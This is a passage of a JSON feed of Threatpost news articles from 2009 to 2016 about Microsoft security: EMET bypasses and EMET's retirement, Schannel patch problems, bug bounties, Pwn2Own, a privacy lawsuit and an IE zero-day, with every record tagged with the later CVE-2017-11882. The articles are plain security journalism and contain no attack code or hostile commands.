"cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-11-03T19:15:56", "id": "THREATPOST:8FACBD9A4509F71E19E07BB451FD68A0", "href": "https://threatpost.com/outlook-web-access-two-factor-authentication-bypass-exists/121777/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:19", "description": "SAN FRANCISCO \u2014 Researchers at Bromium Labs are expected to announce today they have developed an exploit that bypasses all of the mitigations in Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET). Principal security researcher Jared DeMott is scheduled to deliver a presentation this morning at the Security BSides conference explaining how the company\u2019s researchers were able to bypass all of the memory protections offered within the free Windows toolkit.\n\nThe work is significant given that Microsoft has been quick to urge customers to install and run EMET as a [temporary mitigation against zero-day exploits](<http://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117>) targeting memory vulnerabilities in Windows or Internet Explorer.\n\nEMET is not meant to be permanent fix, instead it is supposed to terminate or block actions by malware or exploits threatening previously unreported vulnerabilities until a patch is available.\n\nMicrosoft is expected to release the latest version of EMET this week during the RSA Conference; Rahul Kashyap, chief security architect at Bromium, said the company has been working closely with Microsoft and expects the vulnerability to be addressed in the new EMET release.\n\nEMET comes with a dozen different mitigations starting with Data Execution Prevention and Address Space Layout Randomization, two key memory protections in Windows, as well as a handful of mitigations against return-oriented programming (ROP), heap spray and SEHOP mitigations, and more.\n\nKashyap said Bromium\u2019s bypass bypasses all of EMET\u2019s mitigations, unlike previous bypasses that were able to beat only certain aspects of the tool.\n\n\u201cWe analyzed all of the protections, and took an IE exploit and then we kept on tweaking the exploit payload until we were able to bypass all the mitigations available in EMET,\u201d Kashyap said. \u201cEverything is bypassed in its latest version.\u201d\n\nKashyap said EMET has raised the bar significantly for exploit writers trying to beat Windows\u2019 protections. Malware writers, such as those behind [Operation SnowMan targeting the latest IE zero-day](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>), have taken to adding to modules that scan computers for EMET libraries and will not execute if EMET is installed.\n\n\u201cEMET, like any other tool, needs to know exploitation vectors to be able to block them. We tried to attack that very core, fundamental architectural drawback that most tools today have, which is you need to be detect an exploit in order to protect,\u201d Kashyap said. \u201cIn this case, we studied the mitigations available in EMET and then we tweaked a payload to create a new vector variant which could bypass the existing mitigations.\u201d\n\nIn a [paper](<http://labs.bromium.com/>) released today, DeMott explained that the researchers intended initially to target just the five ROP protections in EMET with a real-world browser exploit. The project grew to include all relevant protections including stack pivot protection, shellcode complete with an EAF bypass and more, DeMott wrote.\n\n\u201cThe impact of this study shows that technologies that operate on the same plane of execution as potentially malicious code, offer little lasting protection,\u201d DeMott wrote. \u201cThis is true of EMET and other similar userland protections.\u201d\n\nBromium said its research focused on 32-bit Windows 7 systems running EMET 4.0 and 4.1 (ROP protection is not implemented for 64-bit processes, the paper said.). ROP is an exploitation technique that evolved from ret2libc, which enables an attacker to inject and execute code by re-using code that already exists. The ROP technique changes executable permissions in memory space, DeMott explained in the paper, in order to execute the attacker\u2019s code located elsewhere. An attacker must chain together a series of processes in order for ROP to succeed.\n\nEMET has been bypassed numerous times before. Researcher [Aaron Portnoy](<http://thunkers.net/~deft/presentations/SummerCon%202013/Aaron_Portnoy-Bypassing_All_Of_The_Things.pptx>), cofounder of Exodus Intelligence, presented a paper during last year\u2019s SummerCon that explained a number of EMET bypasses. Two years ago, a researcher in Iran named Shahriyar Jalayeri reported [two bypasses of EMET\u2019s five ROP protections](<http://threatpost.com/researcher-finds-technique-bypass-microsofts-emet-protections-080912/76895>).\n\nYou can expect researchers to continue to try to poke holes in EMET. The upcoming Pwn2Own contest at the CanSecWest Conference is offering a $150,000 grand prize to anyone able to [bypass EMET running on Windows 8.1 and Internet Explorer 11](<http://threatpost.com/pwn2own-paying-150000-grand-prize-for-microsoft-emet-bypass/104015>).\n", "cvss3": {}, "published": "2014-02-24T08:43:50", "type": "threatpost", "title": "Complete Microsoft EMET Bypass Developed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-26T23:48:50", "id": "THREATPOST:37854AF8C9A75E43ACA98BD95205B6BC", "href": "https://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:04", "description": "[Howard Schmidt](<https://threatpost.com/obama-cybersecurity-chief-other-nations-key-securing-cyberspace-061311/>), the top White House information security adviser, is retiring after more than two years on the job and several decades in security both in government and private industry. Schmidt is in his second stint as the White House security chief and he\u2019s leaving at a time when cybersecurity has moved into the top tier of military and economic concerns for the country.\n\nThe departure is a blow to the Obama administration\u2019s efforts on cybersecurity and comes at a time when the White House is wrangling with Congress on legislation designed to address various information security problems and weaknesses. There are competing proposals in Congress right now and one of the major sticking points has been what kind of information companies will be allowed to share with government agencies regarding attacks and vulnerabilities.\n\nSchmidt, who will leave at the end of the month, took on the role of White House cybersecurity coordinator in early 2010 after a varied and long career in security and law enforcement. He was the CISO of Microsoft, and Air Force officer and had earlier served as the top cybersecurity officer in the George W. Bush administration. After Obama took office, the top information security job was vacant for quite a while and word at the time was that the job had been offered to a variety of top executives in the security industry, but no one had been interested.\n\nThe position was seen as having a lot of prestige, but not much in the way of power because the responsibility for information security inside the federal government is so splintered. The Department of Homeland Security, U.S. Cyber Command, National Security Agency and other groups all have some sort of responsibility for security. There were not many takers for the job of throwing a rope around all of that mess and trying to work with the private sector and other governments to fight cybercrime.\n\n\u201cThe private sector in the prevention of crime is very key, and, once again, look at a continuum. The products that are created, whether it\u2019s software or hardware, become more resistant to some of the things that we see out there, whether it\u2019s phishing/spearphishing, whether it\u2019s vulnerabilities in software and hardware where private sector has a lead role in being able to reduce that from taking place,\u201d [Schmidt said in an interview](<https://threatpost.com/obama-cybersecurity-chief-other-nations-key-securing-cyberspace-061311/>) last year.\n\n\u201cThe other piece, as when we look at some of the things like the National Cyber Security Alliance here in the U.S., we look at some of the other partnerships that take place in Australia, Canada, U.K. and how they work with the private sector, just even some of the messaging thing about how to protect your identity online. ENISA, the European Network Information Security Agency has done a lot of really good work in what they call the AR Group, the Awareness Raising Group that puts together some best practices for consumers and businesses and everything. So, working with the private sector is really key, because they can not only help build the technology that reduces the likelihood of becoming a victim, but they can also help spread the message with their customers.\u201d\n\nSchmidt will be replaced in the White House by Michael Daniel, who works in the budget office, according to a report in the [Washington Post](<http://www.washingtonpost.com/world/national-security/white-houses-cybersecurity-official-retiring/2012/05/16/gIQAX6fmUU_story.html>). Daniel has worked on intelligence and security issues for several years.\n\nOne of the major initiatives undertaken by the White House during Schmidt\u2019s tenure was the development of the National Strategy for Trusted Identities in Cyberspace, a blueprint for the adoption of non-password based online identities. Schmidt said he saw the development of alternative authentication methods as a key for improving security.\n\n\u201cWe\u2019re starting to see a lot of these companies working with other companies to make sure we\u2019re looking at the full breadth of things, not only the one-time password that may be on your mobile device, but also what can we do to make sure that somebody doesn\u2019t wind up hijacking that through some other sort of mechanism? So, overall, I think there\u2019s a full recognition of the challenges we have moving forward. The people that I\u2019ve talked to in the national program office I\u2019ve talked with recognize that the status quo doesn\u2019t apply here, that we can take a lot from the experiences we\u2019ve had in the past and the next generation of trusted identities or strong authentication or in-person proofing, we can much improve over where we\u2019ve been to date, so very, very positive,\u201d he said in the [2011 interview with Threatpost](<https://threatpost.com/schmidt-white-house-feels-very-positive-about-prospects-data-breach-bill-passing-061411/>).\n", "cvss3": {}, "published": "2012-05-17T14:54:17", "type": "threatpost", "title": "White House Security Czar Howard Schmidt Retiring", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:13", "id": "THREATPOST:B4AED814955E51C42BAE9BF0A3A014B0", "href": "https://threatpost.com/white-house-security-czar-howard-schmidt-retiring-051712/76577/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:50", "description": "Some users who have installed the [MS14-066 patch](<https://threatpost.com/microsoft-schannel-bug-latest-in-long-line-of-serious-crypto-flaws/109321>) that fixes a vulnerability in the Schannel technology in Windows are having issues with the fix causing TLS negotiations to fail in some circumstances.\n\nThe problem arises when users have TLS 1.2 enabled in certain configurations and it will sometimes cause processes to hang or become unresponsive from time to time. Microsoft said it\u2019s aware of the issue and is recommending that users who run into the problem disable support for several of the new cipher suites that the MS14-066 patch adds to Windows.\n\n\u201cWe are aware of an issue in certain configurations in which TLS 1.2 is enabled by default, and TLS negotiations may fail. When this problem occurs, TLS 1.2 connections are dropped, processes hang (stop responding), or services become intermittently unresponsive,\u201d Microsoft said in a Knowledge Base [article](<https://support.microsoft.com/kb/2992611>).\n\nMicrosoft recommends that users delete these ciphers from the registry:\n\n * TLS_DHE_RSA_WITH_AES_256_GCM_SHA384\n * TLS_DHE_RSA_WITH_AES_128_GCM_SHA256\n * TLS_RSA_WITH_AES_256_GCM_SHA384\n * TLS_RSA_WITH_AES_128_GCM_SHA256\n\nThe MS14-066 patch fixes a vulnerability in every supported version of Windows that involves the way that Schannel handles certain requests. Schannel is the SSL/TLS implementation in Windows and the vulnerability is remotely exploitable.\n\n\u201cA remote code execution vulnerability exists in the [Secure Channel (Schannel)](<https://technet.microsoft.com/en-us/library/security/dn848375.aspx#Schannel>) security package due to the improper processing of specially crafted packets. Microsoft received information about this vulnerability through coordinated vulnerability disclosure. When this security bulletin was issued,** **Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers. The update addresses the vulnerability by correcting how Schannel sanitizes specially crafted packets,\u201d Microsoft said in its [advisory](<https://technet.microsoft.com/library/security/MS14-066>).\n", "cvss3": {}, "published": "2014-11-17T09:30:34", "type": "threatpost", "title": "Issues Arise With MS14-066 Schannel Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-18T19:54:58", "id": "THREATPOST:9C0FA678FF748B08478CA83EAAEF83B4", "href": "https://threatpost.com/issues-arise-with-ms14-066-schannel-patch/109385/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:21", "description": "Microsoft has no plans to follow in the footsteps of Mozilla and Google and pay researchers cash rewards for the bugs that they find in Microsoft\u2019s products.\n\nIn the wake of both Mozilla and Google significantly increasing their bug bounties to the $3,000 range, there have been persistent rumors in the security community that Microsoft soon would follow suit and start paying bounties as well. However, a company official said on Thursday that Microsoft was not interested in paying bounties.\n\n\u201cWe value the researcher ecosystem, and show that in a variety of ways, but we don\u2019t think paying a per-vuln bounty is the best way. Especially when across the researcher community the motivations aren\u2019t always financial. It is well-known that we acknowledge researcher\u2019s contributions in our bulletins when a researcher has coordinated the release of vulnerability details with the release of a security update,\u201d Microsoft\u2019s Jerry Bryant said in an email. \u201cWhile we do not provide a monetary reward on a per-bug basis, like any other industry, we do recognize and honor talent. We\u2019ve had several influential folks from the researcher community join our security teams as Microsoft employees. We\u2019ve also entered into contracts directly with many vendors and sometimes individual researchers to test our products for vulnerabilities before they\u2019re released. Many of these vendors and individuals first came to our attention based on the high-quality and unique approaches demonstrated by the vulnerabilities they reported to the MSRC.\u201d\n\nSome researchers have been calling on large software vendors such as Microsoft, Adobe, Apple and others to pay for the bugs that outsiders find in their products, but so far none of these companies has shown any indication that they\u2019re willing to do so. Third-party vulnerability buyers such as TippingPoint\u2019s Zero Day Initiative and iDefense Labs pay varying amounts for vulnerabilities, depending upon the severity of the bug. And there is also an unknown number of bugs sold to government agencies, defense contractors and other buyers in private sales every year.\n\nMozilla last week said it was [raising its bug bounty to $3,000](<https://threatpost.com/mozilla-bumps-bug-bounty-3000-071610/>), and Google made a similar move four days later,[ jacking its top price up to $3,133.7](<https://threatpost.com/google-ups-bug-bounty-ante-313370-072010/>).\n\n[block:block=47]\n\nMicrosoft has been using outside researchers to test their software for security flaws on a contract and one-off basis for years now. But much of that work goes to boutique consultancies and not to individual researchers who find the bugs on their own time. That\u2019s one of the reasons that [some researchers have been encouraging their peers to stop reporting vulnerabilities](<https://threatpost.com/no-more-free-bugs-software-vendors-032309/>) to vendors who don\u2019t pay bug bounties. The reasoning being that the vendors have their own in-house testers and consultants, who are getting paid, so there\u2019s nothing in it for outside researchers, aside from an acknowledgement from the vendor.\n", "cvss3": {}, "published": "2010-07-22T20:54:11", "type": "threatpost", "title": "Microsoft Says No to Paying Bug Bounties", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:29", "id": "THREATPOST:632A7F4B404E8A9E7D49A4895D573FDB", "href": "https://threatpost.com/microsoft-says-no-paying-bug-bounties-072210/74249/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:27", "description": "[](<https://threatpost.com/cansecwest-caution-community-play-031909/>)\n\nCanSecWest, in beautiful Vancouver BC, is one of my favorite conferences each year. It\u2019s a cozy little security con that brings together security researchers from all parts of the security ecosystem. Like a [PhNeutral](<http://ph-neutral.darklab.org/>) or a [BlueHat](<http://technet.microsoft.com/en-us/security/cc261637.aspx>), one never quite knows what to expect out of a CanSecWest, but we do know that Microsoft products and engineers will play a prominent role. We\u2019ll be presenting new security innovations and new tools, we\u2019ll be watching Pwn2Own closely for possible hacks, and we\u2019ll be happy to discuss our industry best practices in the hallway track.\n\nSecurity gatherings such as this allow the ecosystem to exchange information and awareness in order to become more secure. The more we know about the attacks, the better prepared we can be on defense. Presentations like Matt Miller\u2019s \u201cThe Evolution of Microsoft\u2019s Exploit Mitigations\u201d and Jason Shirk and Dave Weinstein\u2019s \u201cAutomated Real-time and Post Mortem Security Crash Analysis and Categorization\u201d demonstrate that as Microsoft learns more about an attack, we incorporate this information into techniques and tools that we share with our developer community. Stay tuned for more news and posts throughout the show.\n\n**[ SEE: **[**Android, iPhone security under scrutiny at CanSecWest**](<https://threatpost.com/android-iphone-security-under-scrutiny-cansecwest-031809/>)** ]**\n\nAgain this year, [CanSecWest features the Pwn2Own contest](<http://cansecwest.com/post/2009-03-18-01:00:00.PWN2OWN_Final_Rules>) \u2013 a contest that pits researchers against technologies to see whether technology or human wins. It\u2019s also a contest that presents interesting challenges to Microsoft and a contest which you might think Microsoft opposes. Like many other issues in the security ecosystem \u2013 it\u2019s not that simple. The contest exemplifies two basic tenets behind the TwC Security teams\u2019 efforts. You can\u2019t hide from the truth (wishing doesn\u2019t make it so) and every issue is an opportunity to learn and improve.\n\nWe recognize that all vendors\u2019 products may be found vulnerable and Microsoft welcomes the contest as another opportunity to engage the security community in productive dialogue around responsible disclosure and effective security engineering. We also see that Pwn2Own provides an opportunity to educate the public and we believe it can showcase Microsoft\u2019s security engineering efforts, both relative to our competitors and in an absolute sense.\n\n**[ SEE: [Pwn2Own trifecta: Hacker exploits IE8, Firefox, Safari](<https://threatpost.com/pwn2own-trifecta-hacker-exploits-ie8-firefox-safari-031809/>) ]**\n\nThe security community is offering knowledge of attacks and defenses that consumers and other vendors can use to stay safe or create more secure products. The rest of the story \u2013 and an additional measure the security community could use to evaluate vendors\u2019 products \u2013 is what happens after the content ends. Rest assured Microsoft will take this information and apply it towards securing our networks, platforms and applications (hopefully before they ship), and to create strong response process and engineering discipline that are necessary for our communal security. And as always, the MSRC are ready to work to investigate any vulnerabilities that researchers might find during the Pwn2Own contest.\n\n**[ SEE: **[**Paul Roberts: Mobile security can no longer be ignored**](<https://threatpost.com/mobile-security-can-no-longer-be-ignored-031809/>)** ]**\n\nBy the end of the contest, co-sponsor [Tipping Point](<http://www.zerodayinitiative.com/about/>) will be the owners of many new vulnerabilities. They value the protection of their customers and will need to work with their partners in the security ecosystem to make sure everybody is protected as quickly as possible (one more way consumers benefit). One of the goals of responsible disclosure is for the vulnerability details to emerge at the same time that an update is available from the vulnerable vendor. The CanSecWest conference organizer also has a responsible disclosure policy, as do all of the conference organizers that the EcoStrat team is able to support worldwide each year.\n\nAlthough innovative contests put some of us in a place that is not always comfortable, it\u2019s valuable for the ecosystem to come together with contests like Pwn2Own and Iron Chef Black Hat, to better understand and solve common issues. It\u2019s yet another example of the \u201cteam of rivals\u201d strategy. Let the contest begin!\n\n_* Sarah Blankinship is a senior security strategist lead in Microsoft\u2019s Ecosystem Strategy team._\n", "cvss3": {}, "published": "2009-03-19T15:40:46", "type": "threatpost", "title": "CanSecWest: Caution, community at play", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-03T18:00:20", "id": "THREATPOST:9B11E0EF22481CA407924C58E8C7F8C1", "href": "https://threatpost.com/cansecwest-caution-community-play-031909/72396/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:29", "description": "Microsoft\u2019s lawsuit against the U.S. government for the right to tell its customers when a federal agency is looking at their emails is getting widespread support by privacy advocates. For many, Microsoft\u2019s stance lends an important and powerful voice to ongoing efforts to reform the Electronic Communications Privacy Act that is at the heart of Microsoft\u2019s beef with the government. \n\n\u201cWe applaud Microsoft for challenging government gag orders that prevent companies from being more transparent with their customers about government searches of their data,\u201d said Andrew Crocker, staff attorney with the Electronic Frontier Foundation. \n\nFor Crocker and Microsoft, the stance is tied to bigger issues such as free speech and First Amendment rights. \u201cIn nearly all cases, indefinite gag orders and gag orders issued routinely rather than in exceptional cases are unconstitutional prior restraints on free speech and infringe on First Amendment rights,\u201d he said. \n\nThe software giant\u2019s chief legal officer Brad Smith said Microsoft said it has been required to maintain secrecy about more than 2,500 legal demands over the past 18 months. More than 1,752 (68 percent) of those secrecy orders had no end date. Smith noted that, \u201cThis means we effectively are prohibited forever from telling our customers that the government has obtained their data.\u201d \n\nMicrosoft\u2019s lawsuit challenges gag order provision in the Electronic Communications Privacy Act (ECPA) that allows courts to force companies that offer cloud storage to say nothing when asked to turn over customer data. Reforms of ECPA have been long fought by privacy advocates such as the Electronic Privacy Information Center. \n\nAlan Butler, senior counsel at Electronic Privacy Information Center said that such secret orders by the government should be the exception, but increasingly the requests have become the rule. \u201cNotice is one of the key protections provided under the Fourth Amendment, and law enforcement efforts to delay or otherwise restrict notice should be viewed skeptically by the courts,\u201d he said. \n\nFor the ACLU, it used Microsoft\u2019s lawsuit as an opportunity for Congress to implement reforms on the Electronic Communications Privacy Act. \u201cIf Congress fails to include those changes as it considers ECPA reform, then the courts should step in, including in Microsoft\u2019s case, to end the government\u2019s constitutional failure to provide notice,\u201d said Alex Abdo, staff attorney with the ACLU in a statement.\n\nMicrosoft\u2019s lawsuit is the latest in a string of high-profile battles with the government over privacy issues. Last week, tech firms and privacy advocates banded together to [voice opposition to a draft bill](<https://threatpost.com/burr-feinstein-anti-crypto-bill-slammed-by-critics/117314/>), Compliance with Court Orders Act of 2016. Then, of course, there is Apple and its battle with the government\u2019s demands to help it crack its own encryption in order to break into an iPhone.\n\nControversial aspects of ECPA have been debated for years. In fact, earlier this week the House Judiciary Committee amended a current ECPA reform bill \u2014 the Email Privacy Act \u2014 by removing a provision that also attempts to fix notice requirement. The timing of Microsoft\u2019s suit is fortuitous, Butler said. \n\n\u201cI think this lawsuit will provide a much needed venue to address the lack of notice for email warrants,\u201d Butler said. \u201cCongress has had the opportunity in the past to address this problem, but has not yet taken the steps necessary to do so. The court should reaffirm that notice is a critical component of government searches under the Fourth Amendment,\u201d he said. \n\nAs for Microsoft\u2019s hope of victory? EFF\u2019s Crocker said Microsoft has a strong case. \u201cGiven the numbers Microsoft lists in the complaint and the statute\u2019s failure to comport with the First Amendment, I think there\u2019s a pretty good likelihood the suit will at the minimum force some changes to the government\u2019s practices or ECPA,\u201d Crocker said. \n\nBecause of the secret nature of such requests, it\u2019s impossible to tell how many secret government information requests businesses receive. One estimate from a 2012 report authored by Texas Southern University\u2019s Thurgood Marshall School of Law called \u201c[Gagged, Sealed &amp; Delivered](<https://papers.ssrn.com/sol3/papers.cfm?abstract_id=2071399>)\u201d (PDF), estimates 30,000 electronic surveillance orders approved by magistrate judges each year. \n\u201cIndividuals have a constitutional right to receive notice when their persons, papers, and effects have been subject to search. The denial of this right is a harm, and prevents realistic engagement by the public on an issue of national importance (privacy),\u201d EPIC\u2019s Butler said. \n", "cvss3": {}, "published": "2016-04-15T15:22:02", "type": "threatpost", "title": "Microsoft Wins Widespread Support in Privacy Clash With Govt.", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-04-15T19:22:02", "id": "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "href": "https://threatpost.com/microsoft-wins-widespread-support-in-privacy-clash-with-government/117458/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "[](<https://threatpost.com/new-bug-internet-explorer-used-targeted-attacks-110310/>)There\u2019s a new flaw in all of the current versions of Internet Explorer that is being used in some targeted attacks right now. Microsoft has confirmed the bug and said it is working on a fix, but has no timeline for the patch release yet. The company did not rule out an emergency out-of-band patch, however.\n\nThe new bug in Internet Explorer affects versions 6, 7 and 8, but is not present in IE 9 beta releases, Microsoft said. The company has released an [advisory on the IE vulnerability](<https://www.microsoft.com/technet/security/advisory/2458511.mspx>) and says that some of the exploit protections it has added to recent versions of IE and Windows can help protect against attacks on the bug. Microsoft said that IE 8 running on Windows XP SP 3 and later versions of Windows has DEP (Data Execution Prevention) enabled by default, which helps stop attacks against this specific bug. IE running in Protected Mode also helps mitigate the effects of attacks.\n\n\u201cThe vulnerability exists due to an invalid flag reference within \nInternet Explorer. It is possible under certain conditions for the \ninvalid flag reference to be accessed after an object is deleted. In a \nspecially-crafted attack, in attempting to access a freed object, \nInternet Explorer can be caused to allow remote code execution.\n\n\u201cAt \nthis time, we are aware of targeted attacks attempting to use this \nvulnerability. We will continue to monitor the threat environment and \nupdate this advisory if this situation changes. On completion of this \ninvestigation, Microsoft will take the appropriate action to protect our \ncustomers, which may include providing a solution through our monthly \nsecurity update release process, or an out-of-cycle security update, \ndepending on customer needs,\u201d Microsoft said in its advisory.\n\nThe new IE flaw is likely to be targeted through drive-by download attacks, a common attack scenario for browser vulnerabilities. \n\n\u201cIn a Web-based attack scenario, an attacker could host a Web site that \ncontains a Web page that is used to exploit this vulnerability. In \naddition, compromised Web sites and Web sites that accept or host \nuser-provided content or advertisements could contain specially crafted \ncontent that could exploit this vulnerability. In all cases, however, an \nattacker would have no way to force users to visit these Web sites. \nInstead, an attacker would have to convince users to visit the Web site, \ntypically by getting them to click a link in an e-mail message or \nInstant Messenger message that takes users to the attacker\u2019s Web site,\u201d Microsoft said.\n", "cvss3": {}, "published": "2010-11-03T16:03:17", "type": "threatpost", "title": "New Bug in Internet Explorer Used in Targeted Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:16:08", "id": "THREATPOST:7E324E4AFB9218DCC9509FB4E2277400", "href": "https://threatpost.com/new-bug-internet-explorer-used-targeted-attacks-110310/74636/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:46", "description": "In parallel with its release of 17 bulletins on Patch Tuesday this month, Microsoft also unveiled two new tools that are meant to help make a couple of common exploitation scenarios more difficult for attackers.\n\nThe company released a tool called Office File Validation for some older versions of Office, including Office 2003 and 2007. The feature is specifically designed to give users information about whether there\u2019s a potentially malicious component in an Office file that the user is trying to open. When the user attempts to open a file, the Office File Validation tool will inspect it and look for any signs of malicious behavior. If there\u2019s a problem, the user will get a warning dialog box giving him the opportunity to cancel the operation.\n\nAttackers in the past few months have taken to embedding malicious Flash files inside Word and Excel documents as part of spear phishing campaigns. This was the primary attack vector used to compromise RSA last month.\n\n\u201cOffice File Validation helps detect and prevent a kind of exploit \nknown as a file format attack. File format attacks exploit the integrity \nof a file, and occur when the structure of a file is modified with the \nintent of adding malicious code. Usually the malicious code is run \nremotely and is used to elevate the privilege of restricted accounts on \nthe computer. As a result, an attacker could gain access to a computer \nthat was not previously accessible,\u201d Microsoft said in its [advisory on the validation tool](<https://www.microsoft.com/technet/security/advisory/2501584.mspx>). \n\n\u201cThis could enable an attacker to \nread sensitive information from the computer\u2019s hard disk drive or to \ninstall malware, such as a worm or a key logging program. The Office \nFile Validation feature helps prevent file format attacks by scanning \nand validating files before they are opened. To validate files, Office \nFile Validation compares a file\u2019s structure to a predefined file schema, \nwhich is a set of rules that define what a readable file looks like. If \nOffice File Validation detects that a file\u2019s structure does not follow \nall rules described in the schema, the file does not pass validation.\u201d\n\nThe second enhancement Microsoft pushed out on Tuesday is an [update to winload.exe](<https://www.microsoft.com/technet/security/advisory/2506014.mspx>), the component that loads Windows. The update is designed to help prevent some techniques that rootkits use to evade detection and remain persistent on infected machines.\n\n\u201cFor a rootkit to be successful it must stay hidden and persistent on \na system. One way we have seen rootkits hide themselves on 64-bit \nsystems is bypassing driver signing checks done by winload.exe. While \nthe update itself won\u2019t remove a rootkit, it will expose an installed \nrootkit and give your anti-malware software the ability to detect and \nremove the rootkit,\u201d Microsoft\u2019s Dustin Childs said. \n", "cvss3": {}, "published": "2011-04-12T19:00:28", "type": "threatpost", "title": "Microsoft Pushes Out Two New Security Tools", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:34:45", "id": "THREATPOST:769E9696F176FD575D7F365CA771EFC3", "href": "https://threatpost.com/microsoft-pushes-out-two-new-security-tools-041211/75129/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:29", "description": "Microsoft last week extended the end-of-life expiration date to July 2018 on its exploit mitigation add-on, the Enhanced Mitigation Experience Toolkit (EMET). But for some time, the once-useful tool has been well on its way out to pasture.\n\nWhile EMET was never meant to be anything more than stopgap protection against exploits, attackers and white-hat researchers accelerated its demise with a number of publicized [bypass attacks](<https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/>). That situation, plus Microsoft\u2019s urgency to have users migrate to Windows 10 and the array of new memory mitigations included in the latest OS has brought the curtain down on EMET.\n\n\u201cIt was a stopgap. It was never supposed to be something [Microsoft] wanted people to use longterm,\u201d said Cody Pierce, director of vulnerability research at Endgame. \u201cThey want people to upgrade Windows 10; for the good of their customers, they want to transition them to Windows 10 where there are some protections baked into the operating system.\u201d\n\nForemost is Control Flow Guard, a technology built to counter memory-corruption vulnerabilities, which has been available since Visual Studio 2015 and is also built into Windows 10 and Windows 8.1. [Control Flow Guard](<https://threatpost.com/bypass-developed-for-microsoft-memory-protection-control-flow-guard/114768/>) is thought to be a primary impediment to [use-after-free attacks](<https://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570/>), which became a favorite exploit once ASLR and DEP put a damper in buffer overflow attacks.\n\n\u201cThere are a lot more compile time mitigations [in Windows 10] like Control Flow Guard, and a new Return Flow Guard feature,\u201d said Darren Kemp, security researcher with Duo Security. Kemp also pointed out that since Windows 10\u2019s mitigations are integrated into the operating system, unlike EMET, there are fewer instances where users will notice a performance hit, which was increasingly common with EMET. Also, EMET required close care when configuring it to work, otherwise it could break certain application processes.\n\n\u201cSince it\u2019s not integrated, you don\u2019t get the same type of tight coupling,\u201d Kemp said. \u201cWith a lot of stuff in EMET, you have to test the software you\u2019re applying it to, to make sure the mitigations don\u2019t cause problems. It hooks into functions and injects features. If software does non-standard things, it can cause problems with those apps.\u201d\n\nMicrosoft, meanwhile, has not had EMET on a consistent upgrade path since version 5.0 dropped in 2014. This was an abrupt change from the early days when EMET was introduced and exploits were unleashed within days of Patch Tuesday releases. In announcing the deadline extension to July 31, 2018, Microsoft\u2019s Jeffrey Sutherland acknowledged EMET\u2019s limitations against modern advanced attacks, its performance and reliability shortcomings, and urged users toward Windows 10, which makes the most of hardware virtualization to sandbox applications and links before they can harm the operating system.\n\n\u201cWith the types of threats enterprises face today, we are constantly reminded of this simple truth: modern defense against software vulnerabilities requires a modern platform,\u201d Sutherland said.\n\nThe true value of any mitigation continues to be how well it raises the cost of attacks. Pierce illustrated how advanced attackers have blown well past EMET\u2019s [menu of mitigations](<https://technet.microsoft.com/en-us/security/jj653751>) with advanced logic that automates many facets of an attack that its defenses cannot keep up with.\n\n\u201cIf you\u2019re an exploit kit writer and you acquire a zero day or develop an exploit, you have to get the most bang for your buck; and part of that is supporting a wide range of targets. If you\u2019ve got a Flash exploit, you want it to work on Firefox, Windows, Linux and more and you have to come up with ways to make it easier on you,\u201d Pierce said. \u201cA lot of the ways they\u2019ve figured out to do that bypasses a lot of these late-hook defenses like EMET. They\u2019re getting more value out of it. The types of exploit mitigations EMET provides were limited in utility due to the nature of exploitation. If you look at an exploit kit from 2010, it looks wildly different than it does now.\u201d\n\nDuo\u2019s Kemp, meanwhile, says Windows 10 is one of the hardest targets to breach today.\n\n\u201cThat\u2019s the nature of this stuff: raising the bar. If you\u2019re an attacker, do you want to invest a lot of time and energy to figure out a way around this, or are you going to go after something else?\u201d Kemp said.\n", "cvss3": 